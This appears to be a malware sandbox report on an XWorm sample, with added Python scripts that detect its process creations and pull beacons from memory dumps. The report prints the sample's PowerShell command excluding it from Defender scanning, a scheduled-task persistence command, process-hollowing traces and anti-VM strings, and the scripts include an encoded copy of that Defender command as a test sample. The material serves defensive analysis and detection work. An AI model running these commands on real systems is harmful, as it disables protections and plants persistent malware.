              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe File Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe File Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe Thread delayed: delay time: 30000
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe Thread delayed: delay time: 30000
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Thread delayed: delay time: 30000
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Thread delayed: delay time: 922337203685477
              Source: Amcache.hve.28.dr Binary or memory string: VMware
              Source: Amcache.hve.28.dr Binary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.28.dr Binary or memory string: vmci.syshbin
              Source: Amcache.hve.28.dr Binary or memory string: VMware, Inc.
              Source: Amcache.hve.28.dr Binary or memory string: VMware20,1hbin@
              Source: Amcache.hve.28.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.28.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.28.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.28.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: 9758xBqgE1azKnB.exe, 00000013.00000002.1914378902.00000000068D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Prod_VMware_
              Source: Amcache.hve.28.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: Amcache.hve.28.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.28.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3824966064.0000000001577000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
              Source: Amcache.hve.28.dr Binary or memory string: vmci.sys
              Source: Amcache.hve.28.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.28.dr Binary or memory string: vmci.syshbin`
              Source: Amcache.hve.28.dr Binary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.28.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.28.dr Binary or memory string: VMware20,1
              Source: Amcache.hve.28.dr Binary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.28.dr Binary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.28.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.28.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.28.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.28.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.28.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.28.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.28.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.28.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.28.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Memory written: C:\Users\user\Desktop\9758xBqgE1azKnB.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Memory written: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Memory written: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Memory written: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp"
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Process created: C:\Users\user\Desktop\9758xBqgE1azKnB.exe "C:\Users\user\Desktop\9758xBqgE1azKnB.exe"
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Process created: C:\Users\user\Desktop\9758xBqgE1azKnB.exe "C:\Users\user\Desktop\9758xBqgE1azKnB.exe"
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpBA0A.tmp"
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Process created: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Process created: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpE11A.tmp"
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Process created: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmp21F.tmp"
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Process created: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
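The process creations above are the rows a detection engineer turns into rules: a powershell.exe child running Add-MpPreference -ExclusionPath, schtasks.exe /Create fed an XML file from %LOCALAPPDATA%\Temp (the "Scheduled temp file as task from temp location" Sigma hit in the summary), and the sample relaunching its own image right before the 4D5A write at base 400000. The following is an added example and not code from Joe Sandbox or from XWorm: a Python triage over constructed Sysmon-style process-creation records built from the command lines printed above. The field names Image, ParentImage and CommandLine are an assumption about the log source. It also handles a -EncodedCommand variant of the same cmdlet, which is what the "Powershell Base64 Encoded MpPreference Cmdlet" Sigma title refers to; that encoded record is constructed here, the report itself only shows the plain form.

```python
"""Triage of process-creation events for the evasion chain shown in this report.

Added example, not Joe Sandbox or XWorm code. SAMPLE_EVENTS are constructed
Sysmon-style (Event ID 1) records built from the report's command lines; the
field names Image / ParentImage / CommandLine are an assumption.
"""
import base64
import re
from typing import List, Optional, Tuple

TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
ENCODED_FLAG_RE = re.compile(
    r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def _arg(flag: str, cl: str) -> Optional[str]:
    """Value following `flag` on a Windows command line, honouring double quotes."""
    m = re.search(re.escape(flag) + r'\s+(?:"([^"]*)"|(\S+))', cl, re.IGNORECASE)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def effective_command_line(cl: str) -> str:
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so the
    cmdlet checks below also hit the encoded variant."""
    m = ENCODED_FLAG_RE.search(cl)
    if not m:
        return cl
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cl
    return cl + "\n" + decoded


def detect(ev: dict) -> List[Tuple[str, str]]:
    """Return (finding, detail) pairs for one process-creation record."""
    image = ev["Image"].lower()
    parent = ev["ParentImage"].lower()
    cl = effective_command_line(ev["CommandLine"])
    findings = []

    # 1. Defender exclusion added through PowerShell (T1562.001).
    if image.endswith("\\powershell.exe") and re.search(r"\bAdd-MpPreference\b", cl, re.IGNORECASE):
        for flag in ("-ExclusionPath", "-ExclusionProcess", "-ExclusionExtension"):
            value = _arg(flag, cl)
            if value:
                findings.append(("defender_exclusion", value))

    # 2. Scheduled task registered from an XML file under %LOCALAPPDATA%\Temp (T1053.005).
    if image.endswith("\\schtasks.exe") and re.search(r"/create\b", cl, re.IGNORECASE):
        xml = _arg("/XML", cl)
        if xml and TEMP_DIR_RE.search(xml):
            findings.append(("schtask_from_temp_xml", _arg("/TN", cl) or xml))

    # 3. A user-land binary spawning an identical copy of itself. Next to the
    #    "Memory written ... base: 400000 value starts with: 4D5A" rows this is the
    #    shape of self-hollowing; on its own it is a weak signal (updaters do it too).
    if image == parent and not image.startswith("c:\\windows\\"):
        findings.append(("self_relaunch", image))
    return findings


# Constructed encoded form of the cmdlet seen in the report (the report shows it in clear).
_ENCODED = base64.b64encode(
    'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming\\grjujyNaBLaKbU.exe"'
    .encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed records; command lines 0-2 are copied from the report
    {"Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\user\Desktop\9758xBqgE1azKnB.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference '
                    r'-ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"'},
    {"Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "ParentImage": r"C:\Users\user\Desktop\9758xBqgE1azKnB.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" '
                    r'/XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp"'},
    {"Image": r"C:\Users\user\Desktop\9758xBqgE1azKnB.exe",
     "ParentImage": r"C:\Users\user\Desktop\9758xBqgE1azKnB.exe",
     "CommandLine": r'"C:\Users\user\Desktop\9758xBqgE1azKnB.exe"'},
    {"Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\user\Desktop\9758xBqgE1azKnB.exe",
     "CommandLine": "powershell.exe -enc " + _ENCODED},
    # Benign control: task created by a system process from a non-temp XML, must not fire.
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Maint\Cleanup" /XML "C:\ProgramData\Vendor\cleanup.xml"'},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["Image"].rsplit("\\", 1)[-1], "->", detect(ev))
```

On a live host the same two artifacts are confirmed with Get-MpPreference | Select-Object -ExpandProperty ExclusionPath and schtasks /Query /TN "Updates\grjujyNaBLaKbU" /XML; the registered task under C:\Windows\System32\Tasks\Updates\grjujyNaBLaKbU is the durable artifact even once the tmpXXXX.tmp file it was imported from is gone.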
Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: @\tq@\tq-PING!<Xwormmm>Program Manager<Xwormmm>2003543
Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000035C7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>2008415
Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.0000000003563000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000035B3000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000035C7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.0000000003563000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $tq'PING!<Xwormmm>Program Manager<Xwormmm>0Tetqh7V
Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>2003543
Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $tq-PING!<Xwormmm>Program Manager<Xwormmm>1795112Tetq
Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000035B3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $tq'PING!<Xwormmm>Program Manager<Xwormmm>0Tetqh7[
Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $tq-PING!<Xwormmm>Program Manager<Xwormmm>2003543Tetq
Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000035C7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $tq'PING!<Xwormmm>Program Manager<Xwormmm>0Tetqhw\
Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>1795112
Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000035C7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $tq'PING!<Xwormmm>Program Manager<Xwormmm>0Tetqh7_
Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $tq-PING!<Xwormmm>Program Manager<Xwormmm>2008415Tetq
Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: @\tq@\tq-PING!<Xwormmm>Program Manager<Xwormmm>2008415
Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.0000000003563000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000035B3000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000035C7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: @\tq@\tq'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: @\tq@\tq-PING!<Xwormmm>Program Manager<Xwormmm>1795112
Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.0000000003563000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000035B3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Managert-tq
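The PING! strings above are XWorm keep-alive messages left in the heap of process 7. Their fields are joined with <Xwormmm>, XWorm's default split token (it is set per build, so a rule keyed on it misses rebuilt variants); the second field carries a window title, here "Program Manager", which is the title of the Windows desktop shell window, so nothing else was in the foreground during the run; the third field is numeric and the report does not state its meaning. The $tq / Tetq bytes around each string are surrounding heap residue, not part of the message. The following is an added example and not XWorm or Joe Sandbox code: it pulls such beacons out of a raw memory dump in both the ASCII form printed above and the UTF-16LE form .NET strings normally take in memory. SAMPLE_DUMP is constructed from the rows above plus one UTF-16LE copy.

```python
"""Pull XWorm keep-alive beacons out of a raw process memory dump.

Added example, not XWorm or Joe Sandbox code. SAMPLE_DUMP is constructed from
the PING! strings printed in the report, with the heap residue seen around
them, plus one UTF-16LE copy so both encodings are exercised.
"""
import re
from collections import Counter
from typing import Dict, List, Tuple

# XWorm's default field separator ("SPL" in its configuration). It is chosen per
# build, so keep it a parameter when hunting other samples.
DEFAULT_SPL = "<Xwormmm>"


def _lit(text: str, encoding: str) -> bytes:
    return re.escape(text.encode(encoding))


def beacon_pattern(spl: str = DEFAULT_SPL, encoding: str = "ascii"):
    """bytes regex for PING!<spl><window title><spl><number> in one encoding.
    The title is limited to printable characters and matched lazily so the
    residue around each string is not swallowed into a field."""
    if encoding == "utf-16-le":
        char, digit = rb"(?:[\x20-\x7e]\x00)", rb"(?:[0-9]\x00)"
    else:
        char, digit = rb"[\x20-\x7e]", rb"[0-9]"
    return re.compile(
        _lit("PING!", encoding) + _lit(spl, encoding)
        + b"(" + char + b"{1,128}?)" + _lit(spl, encoding)
        + b"(" + digit + b"+)")


def extract_beacons(blob: bytes, spl: str = DEFAULT_SPL) -> List[Tuple[str, int]]:
    """(window title, counter) for every beacon found; ASCII matches are listed first."""
    found = []
    for encoding in ("ascii", "utf-16-le"):
        for m in beacon_pattern(spl, encoding).finditer(blob):
            found.append((m.group(1).decode(encoding), int(m.group(2).decode(encoding))))
    return found


def summarize(beacons: List[Tuple[str, int]]) -> Dict[str, object]:
    """Window titles the implant reported, with counts, and the sorted counter values."""
    return {"titles": dict(Counter(title for title, _ in beacons)),
            "counters": sorted(counter for _, counter in beacons)}


SAMPLE_DUMP = (  # constructed; residue bytes copied from the report rows
    b"$tq-PING!<Xwormmm>Program Manager<Xwormmm>2003543Tetq\x00\x00"
    b"@\\tq@\\tq-PING!<Xwormmm>Program Manager<Xwormmm>2008415\x00\x00"
    b"$tq'PING!<Xwormmm>Program Manager<Xwormmm>0Tetqh7V\x00\x00"
    + "PING!<Xwormmm>Program Manager<Xwormmm>1795112".encode("utf-16-le")
    + b"\x00" * 8
)

if __name__ == "__main__":
    beacons = extract_beacons(SAMPLE_DUMP)
    print(beacons)
    print(summarize(beacons))
```

Run it against a full dump of the injected process (the .sdmp regions named above, or a minidump) rather than only the strings Joe Sandbox printed; repeated titles across beacons tell you what the victim had in the foreground while the implant was polling.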
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Users\user\Desktop\9758xBqgE1azKnB.exe VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
